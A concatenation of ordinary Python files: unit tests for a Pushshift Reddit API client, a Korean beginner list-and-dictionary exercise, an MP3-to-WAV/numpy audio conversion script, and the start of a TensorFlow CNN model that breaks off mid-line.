api._epoch_utc_to_local(timestamp))\n\n api = PushshiftAPIMinimal(\n detect_local_tz=True, rate_limit_per_minute=self._rate_limit\n )\n for timezone in pytz.common_timezones:\n api._utc_offset_secs = None\n os.environ[\"TZ\"] = timezone\n time.tzset()\n\n expected_secs = (\n timestamp - dt.utcnow().astimezone().utcoffset().total_seconds()\n )\n actual_secs = api._epoch_utc_to_local(timestamp)\n\n self.assertEqual(expected_secs, actual_secs)\n\n def test_wrap_thing(self):\n test_data = {\n \"created_utc\": dt.utcnow().timestamp(),\n \"some\": 12,\n \"arbitrary\": True,\n \"Set\": \"of random\",\n \"keys\": \"to\",\n \"test\": 15.0,\n }\n\n kind = \"TestKind\"\n\n api = PushshiftAPIMinimal(\n detect_local_tz=False, rate_limit_per_minute=self._rate_limit\n )\n wrapped = api._wrap_thing(test_data, kind)\n\n self.assertIn(kind, str(wrapped))\n self.assertEqual(test_data[\"created_utc\"], wrapped.created)\n\n self.assertDictEqual(test_data, wrapped.d_)\n\n for key, val in test_data.items():\n self.assertEqual(val, getattr(wrapped, key))\n\n # pylint: disable=no-self-use\n @mock.patch(\"pushshift_py.pushshift_api_minimal.time.sleep\")\n def test_impose_rate_limit(self, mock_sleep):\n mock_rlcache = mock.NonCallableMock(blocked=False, interval=13)\n\n max_sleep = 69\n backoff = 11\n api = PushshiftAPIMinimal(\n max_sleep=max_sleep, backoff=backoff, rate_limit_per_minute=self._rate_limit\n )\n api._rlcache = mock_rlcache\n\n api._impose_rate_limit()\n mock_sleep.assert_not_called()\n\n mock_rlcache.blocked = True\n\n api._impose_rate_limit()\n mock_sleep.assert_called_with(13)\n\n mock_rlcache.interval = 87\n\n api._impose_rate_limit()\n mock_sleep.assert_called_with(max_sleep)\n\n mock_rlcache.interval = 0\n\n api._impose_rate_limit(6)\n mock_sleep.assert_called_with(6 * backoff)\n\n def test_add_nec_args(self):\n max_results_per_request = 127\n api = PushshiftAPIMinimal(\n max_results_per_request=max_results_per_request,\n rate_limit_per_minute=self._rate_limit,\n )\n\n expected_payload = {key: True for key in PushshiftAPIMinimal._limited_args}\n\n # Ensure limited calls aren't altered\n self.assertDictEqual(\n expected_payload,\n api._add_nec_args({key: True for key in PushshiftAPIMinimal._limited_args}),\n )\n\n # Ensure limit is added as expected\n self.assertDictEqual(\n {\"arbitrary\": \"value\", \"limit\": max_results_per_request},\n api._add_nec_args({\"arbitrary\": \"value\"}),\n )\n\n # Ensure created_utc is appended to filter\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [\"created_utc\"],\n },\n api._add_nec_args({\"more_arbitrary\": \"more_value\", \"filter\": []}),\n )\n\n # Ensure string filter turned to list\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [\"some_string\", \"created_utc\"],\n },\n api._add_nec_args(\n {\"more_arbitrary\": \"more_value\", \"filter\": \"some_string\"}\n ),\n )\n\n # Ensure iterable-but-not-list filter turned to list\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [0, 1, 2, \"created_utc\"],\n },\n api._add_nec_args(\n {\"more_arbitrary\": \"more_value\", \"filter\": set(x for x in range(0, 3))}\n ),\n )\n\n # Ensure \"created_utc\" string filter turned to list\n self.assertDictEqual(\n {\n \"more_arbitrary\": \"more_value\",\n \"limit\": max_results_per_request,\n \"filter\": [\"created_utc\"],\n },\n api._add_nec_args(\n {\"more_arbitrary\": \"more_value\", \"filter\": \"created_utc\"}\n ),\n )\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._impose_rate_limit\")\n @mock.patch(\"pushshift_py.pushshift_api_minimal.requests.get\")\n def test_get(self, mock_get, mock_rate_limit):\n max_retries = 7\n expected_result = \"test_text\"\n test_url = \"example.com/route\"\n\n api = PushshiftAPIMinimal(\n max_retries=max_retries, rate_limit_per_minute=self._rate_limit\n )\n\n mock_get.return_value = MockResponse(\n status_code=200, text=json.dumps(expected_result)\n )\n\n self.assertEqual(expected_result, api._get(test_url))\n\n # Ensure the correct count of retries triggered\n mock_get.assert_called_with(test_url, params={})\n self.assertEqual(1, mock_get.call_count)\n\n # Ensure the rate limit was applied\n self.assertEqual(1, mock_rate_limit.call_count)\n mock_rate_limit.assert_has_calls([mock.call(0)])\n\n mock_get.return_value.raise_for_status.assert_called_once()\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._impose_rate_limit\")\n @mock.patch(\"pushshift_py.pushshift_api_minimal.requests.get\")\n def test_get_429(self, mock_get, mock_rate_limit):\n max_retries = 7\n expected_result = \"test_text\"\n test_url = \"example.com/route\"\n\n api = PushshiftAPIMinimal(\n max_retries=max_retries, rate_limit_per_minute=self._rate_limit\n )\n\n mock_get.return_value = MockResponse(\n status_code=429, text=json.dumps(expected_result)\n )\n\n self.assertEqual(expected_result, api._get(test_url))\n\n # Ensure the correct count of retries triggered\n mock_get.assert_called_with(test_url, params={})\n self.assertEqual(max_retries, mock_get.call_count)\n\n # Ensure the rate limit was applied\n self.assertEqual(max_retries, mock_rate_limit.call_count)\n mock_rate_limit.assert_has_calls(\n [mock.call(idx) for idx in range(0, max_retries)]\n )\n\n # This is the key difference with code 429\n mock_get.return_value.raise_for_status.assert_not_called()\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._impose_rate_limit\")\n @mock.patch(\"pushshift_py.pushshift_api_minimal.requests.get\")\n def test_get_raise_for_status(self, mock_get, mock_rate_limit):\n max_retries = 7\n expected_result = \"test_text\"\n test_url = \"example.com/route\"\n\n api = PushshiftAPIMinimal(\n max_retries=max_retries, rate_limit_per_minute=self._rate_limit\n )\n\n # Test a subset of codes that should cause an outright failure\n for idx, status_code in enumerate(\n [400, 401, 403, 404, 405, 500, 502, 503, 504]\n ):\n mock_get.return_value = MockResponse(\n status_code=status_code, text=json.dumps(expected_result)\n )\n\n try:\n api._get(test_url)\n self.fail(\"call failed to trigger expected exception\")\n except HTTPError as exc:\n self.assertIn(\n \"{} {} Error\".format(\n status_code, \"Server\" if status_code >= 500 else \"Client\"\n ),\n str(exc),\n )\n\n expected_calls = max_retries * (idx + 1)\n\n # Ensure the correct count of retries triggered\n mock_get.assert_called_with(test_url, params={})\n self.assertEqual(expected_calls, mock_get.call_count)\n\n # Ensure the rate limit was applied\n self.assertEqual(expected_calls, mock_rate_limit.call_count)\n mock_rate_limit.assert_has_calls(\n [mock.call(idx) for idx in range(0, max_retries)]\n )\n\n mock_get.return_value.raise_for_status.assert_called_once()\n\n def test_apply_timestamp(self):\n api = PushshiftAPIMinimal(rate_limit_per_minute=self._rate_limit)\n\n api._last_timestamp = None\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\"}, api._apply_timestamp({\"rand_field\": \"rand_val\"})\n )\n\n api._last_timestamp = 12307501\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\", \"before\": 12307501},\n api._apply_timestamp({\"rand_field\": \"rand_val\"}),\n )\n\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\", \"sort\": \"desc\", \"before\": 12307501},\n api._apply_timestamp({\"rand_field\": \"rand_val\", \"sort\": \"desc\"}),\n )\n\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\", \"sort\": \"asc\", \"after\": 12307501},\n api._apply_timestamp({\"rand_field\": \"rand_val\", \"sort\": \"asc\"}),\n )\n\n def test_raise_for_unpageable(self):\n max_results_per_request = 10\n valid_payloads = [\n {},\n {\"sort_type\": \"created_utc\"},\n {\"sort_type\": \"created_utc\", \"sort\": \"desc\"},\n {\"sort_type\": \"created_utc\", \"sort\": \"asc\"},\n {\"sort_type\": \"score\", \"sort\": \"desc\", \"limit\": 2},\n {\"sort_type\": \"num_comments\", \"sort\": \"asc\", \"limit\": 5},\n {\"sort_type\": \"whatever\", \"sort\": \"desc\", \"limit\": 8},\n {\"sort_type\": \"seriously_whatever\", \"sort\": \"desc\", \"limit\": 10},\n ]\n\n invalid_payloads = [\n {\"sort_type\": \"score\"},\n {\"sort_type\": \"num_comments\", \"sort\": \"desc\"},\n {\"sort_type\": \"whatever\", \"sort\": \"asc\"},\n {\"sort_type\": \"score\", \"sort\": \"desc\", \"limit\": 11},\n {\"sort_type\": \"num_comments\", \"sort\": \"asc\", \"limit\": 15},\n {\"sort_type\": \"whatever\", \"sort\": \"desc\", \"limit\": 18},\n {\"sort_type\": \"seriously_whatever\", \"sort\": \"desc\", \"limit\": 110},\n ]\n\n api = PushshiftAPIMinimal(\n max_results_per_request=max_results_per_request,\n rate_limit_per_minute=self._rate_limit,\n )\n\n for payload in valid_payloads:\n # Everything should page fine\n api._raise_for_unpageable(payload)\n\n for payload in invalid_payloads:\n try:\n api._raise_for_unpageable(payload)\n self.fail(\"Expected exception failed to trigger\")\n except NotImplementedError as exc:\n msg = str(exc)\n # General error\n self.assertIn(PushshiftAPIMinimal._page_error_msg, msg)\n\n # Error specifics\n if \"limit\" in payload:\n self.assertIn(\n \"queries require limit <= max_results_per_request\", msg\n )\n else:\n self.assertIn(\"must provide a limit\", msg)\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_handle_paging_high_limit(self, mock_get):\n test_url = \"example.com/route\"\n test_data = [\n {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": 1530047819, \"id\": \"e1ccvnb\", \"score\": 8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530048703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530049319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530049619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530049719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530049819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530148703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530149319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530149619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530149719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530149819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n ]\n mock_get.side_effect = test_data\n\n api = PushshiftAPIMinimal(\n max_results_per_request=10, rate_limit_per_minute=self._rate_limit\n )\n results = api._handle_paging(test_url, {\"limit\": 25})\n\n self.assertEqual(test_data[0], next(results))\n self.assertEqual(1530047819, api._last_timestamp)\n self.assertEqual(1, mock_get.call_count)\n mock_get.assert_called_with(test_url, {\"limit\": 10})\n\n self.assertEqual(test_data[1], next(results))\n self.assertEqual(1530049819, api._last_timestamp)\n self.assertEqual(2, mock_get.call_count)\n mock_get.assert_called_with(test_url, {\"limit\": 10, \"before\": 1530047819})\n\n self.assertEqual(test_data[2], next(results))\n self.assertEqual(1530149819, api._last_timestamp)\n self.assertEqual(3, mock_get.call_count)\n mock_get.assert_called_with(test_url, {\"limit\": 5, \"before\": 1530049819})\n\n try:\n next(results)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_handle_paging_low_limit(self, mock_get):\n expected_last_timestamp = 1530047819\n test_url = \"example.com/route\"\n mock_get.return_value = {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": expected_last_timestamp, \"id\": \"e1ccvnb\", \"score\": 8},\n ]\n }\n\n api = PushshiftAPIMinimal(\n max_results_per_request=10, rate_limit_per_minute=self._rate_limit\n )\n results = api._handle_paging(test_url, {\"limit\": 5})\n\n self.assertEqual(mock_get.return_value, next(results))\n self.assertEqual(expected_last_timestamp, api._last_timestamp)\n mock_get.assert_called_once_with(test_url, {\"limit\": 5})\n\n try:\n next(results)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_handle_paging_no_limit(self, mock_get):\n expected_last_timestamp = 1530047819\n test_url = \"example.com/route\"\n mock_get.return_value = {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": expected_last_timestamp, \"id\": \"e1ccvnb\", \"score\": 8},\n ]\n }\n\n api = PushshiftAPIMinimal(\n max_results_per_request=10, rate_limit_per_minute=self._rate_limit\n )\n results = api._handle_paging(test_url, {})\n\n # Run the first call outside of the loop.\n # The call values will vary slightly after the first call.\n self.assertEqual(mock_get.return_value, next(results))\n self.assertEqual(expected_last_timestamp, api._last_timestamp)\n mock_get.assert_called_once()\n mock_get.assert_called_with(test_url, {\"limit\": 10})\n\n # This could go on forever. We stop after 15 calls.\n for call_count in range(2, 15):\n self.assertEqual(mock_get.return_value, next(results))\n self.assertEqual(call_count, mock_get.call_count)\n self.assertEqual(expected_last_timestamp, api._last_timestamp)\n mock_get.assert_called_with(\n test_url, {\"limit\": 10, \"before\": expected_last_timestamp}\n )\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n def test_search(self, mock_paging):\n mock_paging.return_value = self._search_test_data\n\n kind = \"TestKind\"\n expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n api = PushshiftAPIMinimal(\n domain=\"test-domain\",\n rate_limit_per_minute=self._rate_limit,\n detect_local_tz=False,\n )\n\n result_gen = api._search(kind)\n\n for data_grp in self._search_test_data:\n for test_item in data_grp[\"data\"]:\n actual_item = next(result_gen)\n\n self.assertIn(kind, str(actual_item))\n self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n self.assertDictEqual(test_item, actual_item.d_)\n\n for key, val in test_item.items():\n self.assertEqual(val, getattr(actual_item, key))\n\n mock_paging.assert_called_once_with(expected_url, {})\n\n # Make sure everything is complete\n try:\n next(result_gen)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n def test_search_batch(self, mock_paging):\n mock_paging.return_value = self._search_test_data\n\n kind = \"TestKind\"\n expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n api = PushshiftAPIMinimal(\n domain=\"test-domain\",\n rate_limit_per_minute=self._rate_limit,\n detect_local_tz=False,\n )\n\n result_gen = api._search(kind, return_batch=True)\n\n for data_grp in self._search_test_data:\n expected_batch = data_grp[\"data\"]\n actual_batch = next(result_gen)\n\n self.assertEqual(len(expected_batch), len(actual_batch))\n\n for idx, test_item in enumerate(expected_batch):\n actual_item = actual_batch[idx]\n\n self.assertIn(kind, str(actual_item))\n self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n self.assertDictEqual(test_item, actual_item.d_)\n\n for key, val in test_item.items():\n self.assertEqual(val, getattr(actual_item, key))\n\n mock_paging.assert_called_once_with(expected_url, {})\n\n # Make sure everything is complete\n try:\n next(result_gen)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n def test_search_stop_condition(self, mock_paging):\n mock_paging.return_value = self._search_test_data\n\n kind = \"TestKind\"\n expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n api = PushshiftAPIMinimal(\n domain=\"test-domain\",\n rate_limit_per_minute=self._rate_limit,\n detect_local_tz=False,\n )\n\n result_gen = api._search(kind, stop_condition=lambda x: x.created > 1530049619)\n\n for data_grp in self._search_test_data:\n for test_item in data_grp[\"data\"]:\n if test_item[\"created_utc\"] > 1530049619:\n break\n\n actual_item = next(result_gen)\n\n self.assertIn(kind, str(actual_item))\n self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n self.assertDictEqual(test_item, actual_item.d_)\n\n for key, val in test_item.items():\n self.assertEqual(val, getattr(actual_item, key))\n\n mock_paging.assert_called_once_with(expected_url, {})\n\n # Make sure everything is complete\n try:\n next(result_gen)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n def test_search_stop_cond_batch(self, mock_paging):\n mock_paging.return_value = self._search_test_data\n\n kind = \"TestKind\"\n expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n api = PushshiftAPIMinimal(\n domain=\"test-domain\",\n rate_limit_per_minute=self._rate_limit,\n detect_local_tz=False,\n )\n\n result_gen = api._search(\n kind, stop_condition=lambda x: x.created > 1530049619, return_batch=True\n )\n\n for data_grp in self._search_test_data:\n # Transform our source data to match what we expect with the stop condition\n expected_batch = list(\n filter(lambda x: x[\"created_utc\"] <= 1530049619, data_grp[\"data\"])\n )\n actual_batch = next(result_gen)\n\n self.assertEqual(len(expected_batch), len(actual_batch))\n\n for idx, test_item in enumerate(expected_batch):\n actual_item = actual_batch[idx]\n\n self.assertIn(kind, str(actual_item))\n self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n self.assertDictEqual(test_item, actual_item.d_)\n\n for key, val in test_item.items():\n self.assertEqual(val, getattr(actual_item, key))\n\n # Indicates that we hit the stop condition\n if len(expected_batch) < len(data_grp[\"data\"]):\n break\n\n mock_paging.assert_called_once_with(expected_url, {})\n\n # Make sure everything is complete\n try:\n next(result_gen)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n","sub_path":"tests/test_pushshift_api_minimal.py","file_name":"test_pushshift_api_minimal.py","file_ext":"py","file_size_in_byte":28983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"9884714","text":"# -*- coding: utf-8 -*- \n\n# 3.1 year_lists\nyear_lists = ['1980', '1981', '1982', '1983', '1984']\n\n# 3.2 세 번째 생일\nyear_lists[3];\n\n# 3.3 가장 나이가 많은\nyear_lists[0];\n\n# 3.4 things\nthings = ['mozzarella', 'cinderella', 'salmonella'];\n\n# 3.5 사람 이름의 첫 글짜를 대문짜로 바꿔서 출력\ntempStr = ','.join(things);\nprint(tempStr.capitalize())\n\n# 3.6 치즈 요소를 모두 대문자로\nprint(tempStr.title());\n\n# 3.8 surprise 리스트\nsurprise = ['Groucho', 'Chico', 'Harpo'];\n# 3.9 리스트의 마지막 요소를 소문자로 역전 시킨후, 단어를 역전시킨 후 첫글자를 대문자로 바꿔라\n\nprint(surprise[2].lower()[::-1].capitalize());\n# 3.10 f2e 딕셔너리\nf2e = {\n 'dog': 'chien',\n 'cat': 'chat',\n 'walrus': 'morse'\n}\n# 영어 walrus를 프랑스어로 출력\nprint(f2e['walrus']);\ne2f = {};\nfor key, value in f2e.items():\n tempDict = {\n value: key\n }\n e2f.update(tempDict)\nprint(e2f);","sub_path":"chapter03/practice3.py","file_name":"practice3.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"382647473","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 19 13:24:24 2021\n\n@author: Adi\n\"\"\"\nimport numpy as np\nimport os\nimport librosa\nimport re\nimport subprocess\nimport pandas as pd\nfrom tinytag import TinyTag\nimport sound_similarity\n\ndef fix_string(st_in):\n # only lower case\n st0 = st_in.lower() #casefold() ?\n st1 = re.sub(\"[^0-9a-zA-Z,' ']\", \"\",st0)\n no_good_string =[' hd','hd ','official music video','official','video']\n for bad in no_good_string:\n st1 =st1.replace(bad,'')\n st2 =st1\n st2 = st2.replace(\",\", \"\")\n st2 = st2.replace(\".\", \"\")\n st2 = st2.replace(\"'\", \"\")\n # remove all space long then 1\n while ' ' in st2:\n st2 = st2.replace(\" \", \" \")\n \n if len(st2)<2: #not english\n st22=st0\n st22 = st22.replace(\"-\", \"\")\n st22 = st22.replace(\":\", \"\")\n st22 = st22.replace(\"@\", \"\")\n st22 = st22.replace(\"#\", \"\")\n st22 = st22.replace(\",\", \"\")\n st22 = st22.replace(\".\", \"\")\n st22 = st22.replace(\"'\", \"\")\n \n while ' ' in st22:\n st22 = st22.replace(\" \", \" \")\n st2 = st22\n \n while st2[-1]==' ':\n st2=st2[:-1]\n \n # replace space with '_'\n st3 = st2.replace(\"_\", \"\") # to prevent double '_'\n st3 = st3.replace(\" \", \"_\")\n\n return st3\n\ndef fft_np(sig,sr):\n n = len(sig)\n freq = np.fft.rfftfreq(n,d=1/rate)\n out = np.abs(np.fft.rfft(y)/n)\n return out,freq \n\ndef restart_index_sound_data(path):\n columns_name=['name',\n 'old_name',\n 'len[sec]',\n 'number of bit',\n 'bit for sec',\n 'artist',\n 'title',\n 'albume',\n 'path_wav',\n 'path_sound_np',\n 'no missing data']\n \n index_data = pd.DataFrame(columns=columns_name).set_index('name')\n index_data.to_csv(path)\n\ndef new_sound_data(name,old_name,path):\n df1 = pd.read_csv(path).set_index('name')\n if name in df1.index:\n print('song name is in data frame')\n return True ,df1\n df2 = pd.DataFrame([[name,old_name,False]],columns=['name','old_name','no missing data']).set_index('name')\n df1 = df1.append(df2)\n df1.to_csv(path)\n return False,df1\n\nmain_phath =r'D:\\github\\video_to_sound\\video_to_sound'\n\n# path for file\nphath_to_index_sound_data = main_phath+r'\\data\\data_sound_sim\\index_sound_data.csv'\n\n# path for folder\nphath_for_mp3_sound = main_phath+r'\\data\\data_sound_sim\\mp3_sound2'\nphath_for_wav_sound = main_phath+r'\\data\\data_sound_sim\\wav_sound2'\nphath_for_np_sound = main_phath+r'\\data\\data_sound_sim\\np_sound2'\n\n\n# parameter for procesing\n\n\nmp3_file = os.listdir(phath_for_mp3_sound)\n\nmp3_file = pd.read_csv(phath_to_index_sound_data)['name'].tolist()\n\nfor file_name in mp3_file: # loop on video in folder \"raw_video\"\n # clean song name from char 'Brit go H;Ome'=> 'brit_go_home'\n print('------')\n print(file_name[:-4])\n #file_name_r = fix_string(file_name[:-4])\n file_name_r = file_name\n print(file_name_r)\n print('-------new song:',file_name_r)\n # load index_data (pandas datafram) try to add new song name\n \n sound_mp3_phath = phath_for_mp3_sound+'\\\\'+file_name\n print('sound_mp3_phath',sound_mp3_phath)\n \n \n flag_name,data_index = new_sound_data(file_name_r,file_name[:-4],phath_to_index_sound_data)\n if flag_name and data_index.at[file_name_r,'no missing data'] : #if name in data, move to next song\n print('song in data, no misissing data, move to next song')\n os.remove(sound_mp3_phath)\n continue\n \n # all name+path of new file\n \n sound_wav_phath = phath_for_wav_sound+'\\\\'+file_name_r+'.wav'\n print('sound_wav_phath',sound_wav_phath)\n sound_np_phath = phath_for_np_sound+'\\\\'+file_name_r+'.npy'\n print('sound_np_phath',sound_np_phath)\n print('--------------------start---------------')\n # test if wav in folder\n if (file_name_r+'.wav') not in os.listdir(phath_for_wav_sound):\n print('no wav file')\n try:\n print(sound_mp3_phath)\n print(sound_wav_phath)\n temp_proc = subprocess.call(['ffmpeg', '-i', sound_mp3_phath,sound_wav_phath],shell=True)\n print('convert mp3 to wav')\n except:\n print('error converting mp3 to wav')\n continue\n \n # parameters for converting wav to vector\n sampling_rate = 32768 # [Hz] 2^15\n \n \n # test if np sound in folder\n if (file_name_r+'.npy') not in os.listdir(phath_for_np_sound):\n print('no numpy sound file in folder')\n print(sound_wav_phath)\n (sig, rate) = librosa.load(sound_wav_phath, sr=sampling_rate)\n np.save(sound_np_phath, sig)\n print('convert wav file to numpy')\n \n else:\n print('numpy sound file exists')\n rate = sampling_rate\n sig = np.load(sound_np_phath)\n \n #tag = TinyTag.get(sound_mp3_phath)\n\n \n #data_index.at[file_name_r,'number of bit'] = len(sig)\n #data_index.at[file_name_r,'len[sec]'] = tag.duration\n #data_index.at[file_name_r,'bit for sec'] = len(sig)/data_index.at[file_name_r,'len[sec]']\n #try :\n #data_index.at[file_name_r,'artist'] = fix_string(tag.artist)\n #data_index.at[file_name_r,'title'] = fix_string(tag.title)\n #data_index.at[file_name_r,'albume'] = fix_string(tag.album)\n \n #except:\n #pass\n \n #data_index.at[file_name_r,'path_sound_np'] = sound_np_phath\n #data_index.at[file_name_r,'path_wav'] = sound_wav_phath\n print('1')\n grid = 180\n if data_index.at[file_name_r,'len[sec]'] > 180:\n print('2')\n len_to_index = int(data_index.at[file_name_r,'number of bit']*(180/data_index.at[file_name_r,'len[sec]']))\n sig1 = sig[:len_to_index]\n \n else:\n print('1')\n sig1 = np.zeros(180)\n sig1[:data_index.at[file_name_r,'number of bit']] = sig\n \n print('2')\n p1 = int( (0.3*data_index.at[file_name_r,'number of bit'])//grid)\n print('3')\n v1 = sound_similarity.crop_sig_mean(sig1,p=p1,grid=grid,padding=0)\n print('4')\n #print(v2)\n index1 = sound_similarity.sig_dist_full(v1)\n print('5')\n data_index.at[file_name_r,'index3min'] = v1\n print('1')\n data_index.at[file_name_r,'no missing data'] = True\n print('1')\n data_index.to_csv(phath_to_index_sound_data)\n print('1')\n os.remove(sound_mp3_phath)\n\n\n ","sub_path":"convert_mp3_to_wav.py","file_name":"convert_mp3_to_wav.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"28046957","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nimport csv\n\n# Helpful Resources:\n# https://stackoverflow.com/questions/49698567/how-to-save-tensorflow-model-using-estimator-export-savemodel/49805051\ndef serving_input_receiver_fn():\n serialized_tf_example = tf.placeholder(dtype=tf.string, name=\"input_tensors\")\n receiver_tensors = {\"predictor_inputs\": serialized_tf_example}\n feature_spec = {'x': tf.FixedLenSequenceFeature(shape=[150, 150, 3], dtype=tf.float32, allow_missing=True)}\n test_features = tf.parse_example(serialized_tf_example, feature_spec)\n return tf.estimator.export.ServingInputReceiver(test_features, receiver_tensors)\n\ndef cnn_model_fn(features, labels, mode):\n \"\"\"\n Model function for CNN.\n \"\"\"\n features = features[list(features.keys())[0]]\n\n # NOTE: only uncomment and use this if saving entire file AFTER training\n # TODO: figure out proper way to do this\n print(features)\n features = tf.reshape(features, [-1, 150, 150, 3])\n print(features)\n\n # Feature Extractor:\n # ---------------------------------------------------------------------------------------------------------\n # Convolutional Layer #1\n # 15x15 kernel, 50 filters\n # Input: [batch_size, 150, 150, 3]\n # Output: [batch_size, 136, 136, 50]\n # https://www.quora.com/How-can-I-calculate-the-size-of-output-of-convolutional-layer\n conv1 = tf.layers.conv2d(\n inputs=features,\n filters=50,\n kernel_size=[15, 15],\n padding=\"valid\",\n activation=tf.nn.relu)\n\n # Pooling Layer #1\n # 4x4 pool, stride size of 2\n # Input: [batch_size, 136, 136, 50]\n # Output: [batch_size, 67, 67, 50]\n # *see above ^\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[4, 4], strides=2)\n\n # Convolutional Layer #2\n # 5x5 kernel, 75 filters\n # Input: [batch_size, 67, 67, 50]\n # Output: [batch_size, 63, 63, 75]\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=75,\n kernel_size=[5, 5],\n padding=\"valid\",\n activation=tf.nn.relu)\n\n # Pooling Layer #2\n # 3x3 pool, stride size of 2\n # Input: [batch_size, 63, 63, 75]\n # Output: [batch_size, 31, 31, 75]\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[3, 3], strides=2)\n\n # Convolutional Layer #3\n # 3x3 kernel, 100 filters\n # Input: [batch_size, 31, 31, 75]\n # Output: [batch_size, 29, 29, 100]\n conv3 = tf.layers.conv2d(\n inputs=pool2,\n filters=100,\n kernel_size=[3, 3],\n padding=\"valid\",\n activation=tf.nn.relu)\n\n # Pooling Layer #3\n # 3x3 pool, stride size of 2\n # Input: [batch_size, 29, 29, 100]\n # Output: [batch_size, 14, 14, 100]\n pool3 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[3, 3], strides=2)\n\n # Convolutional Layer #4\n # 3x3 kernel, 150 filters\n # Input: [batch_size, 14, 14, 100]\n # Output: [batch_size, 12, 12, 150]\n conv4 = tf.layers.conv2d(\n inputs=pool3,\n filters=150,\n kernel_size=[3, 3],\n padding=\"valid\",\n activation=tf.nn.relu)\n\n # Pooling Layer #3\n # 2x2 pool, stride size of 2\n # Input: [batch_size, 12, 12, 150]\n # Output: [batch_size, 6, 6, 150]\n pool4 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2)\n\n # Determination:\n # ---------------------------------------------------------------------------------------------------------\n # Flatten tensor into a batch of vectors\n # Input Tensor Shape: [batch_size, 6, 6, 150]\n # Output Tensor Shape: [batch_size, 6 * 6 * 150]\n pool4_flat = tf.reshape(pool4, [-1, 6 * 6 * 150])\n\n # Dense Layer\n # Input Tensor Shape: [batch_size, 6 * 6 * 150]\n # Output Tensor Shape: [batch_size, 1024]\n dense = tf.layers.dense(inputs=pool4_flat, units=1024, activation=tf.nn.relu)\n\n # Add dropout operation; 0.6 probability that element will be kept\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode 